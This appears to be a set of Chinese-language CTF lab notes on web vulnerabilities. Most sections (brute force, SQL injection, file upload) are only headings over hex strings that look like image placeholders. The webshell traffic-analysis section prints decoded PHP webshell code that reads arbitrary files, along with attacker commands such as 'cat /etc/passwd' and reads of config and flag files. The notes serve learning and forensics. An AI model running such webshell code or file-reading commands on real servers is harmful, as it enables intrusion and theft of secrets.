Web靶场漏洞

暴力破解

基于表单的暴力破解

9bd9e3a37b55f8c3344cffbd06902a7c

a6b75ff20d810ff7f3f9381c987b268f

1748f9824b5af7afd1641bb98df564ec

b0bef142b032dfdac491048494339c76

f852f9b04eedc3c049a0e741ae00fae2

2f49f32c3013702516e463ed1fad739d

验证码绕过(on server)

4f3d1a4051c0cb2fe96efc8d1fed5fce

41a97ef4314a50fcbcf2fe046d177543

1ea740ac73a3004061aa42399baf2437

0055fac19544c4e5e98c1b1c446a6f5e

a0ae2783ca734303eb40d6864b180dac

03f830178cb6cf24f1ed13046ecf9584

SQL注入

数字型注入

fdb102bbafcf47fc9772eb5616e8329b

c7a484fe40532bc4887d3b27bc9b8941

da35c70ba203e8097e78648a42a6ae88

061b5d7eea01d180cf01fc70a20fe1e8

6b70cfb26a95bb65fb01e036c5b30db7

585b191bbebac0f3227c71f97954b1a9

0a6d5c101a4ac7b998a0e3be5df61996

c1c729a91ce59602a10fe22437e5ac53

9b3b62e9018d62a153aebf75ad30bead

字符型注入

40537edf782138f65e10c1eb6538ad0e

73b821446f75691cf6d60e43a34340aa

75e7812687398f586053e9cf5afffdba

c85695cd13e3f4ce5eebe16a26492e78

文件上传

MIME type

c69a45f4141186250af716a735081d62

89383a2603e8cb032888d293fb315990

MIME type

cd6f00f34a4780a5c7e999ca28e8b72a

client check

5d6073fbee05e1700cc4664e776ac22d

1afc6e8b4b179fef728b01b1a1350063

c8e6757db4526658fb63212fa14f3429

流量分析

webshell流量分析

45b0e443754773361a064a0866bd2e2b

5cdd88001a8a52ba9109a0583f29550c

f73ecb5abfa4353515b64a0e7dd4c1e2

c4ed52d35840f4849130066a625c77ff

将过滤出来的六条数据包依次进行解码,解码获得的php代码中显示

$F = base64_decode(substr($_POST["t41ffbc5fb0c04"], 2));

@readfile($F);

即从 POST 参数中取出一个“被伪装过的文件路径”,还原成真实路径后,直接把这个文件的内容读出来并返回给攻击者,所以解码后获得攻击者完整攻击路径:

/var/www/html/config.php

/var/www/html/flag.txt

/var/www/html/

cd "/var/www/html";id;echo e124bc;pwd;echo 43523

cd "/var/www/html";ls;echo e124bc;pwd;echo 43523

cd "/var/www/html";cat /etc/passwd;echo e124bc;pwd;echo 43523

tls流量分析

780d43fc188dd95b6c8ff39fc1ae807a

bb110b9b8256567525b0ca871495d41d

从中获取以下信息

TLSv1.2 Record Layer: Handshake Protocol: Client Hello

非TLS1.0/1.1,非明文,安全传输

Server Name: api.ctfhub.com

明确域名,合法HTTPS访问,非硬编码IP,为正常业务流量

Cipher Suite: TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 (0xc02b)

前向安全,AEAD模式,无弱算法,是现代加密套件

ALPN Next Protocol: h2

ALPN Next Protocol: http/1.1

支持HTTP/2,标准Web客户端行为,正常的SDK特征。

综上所述,为安全通信。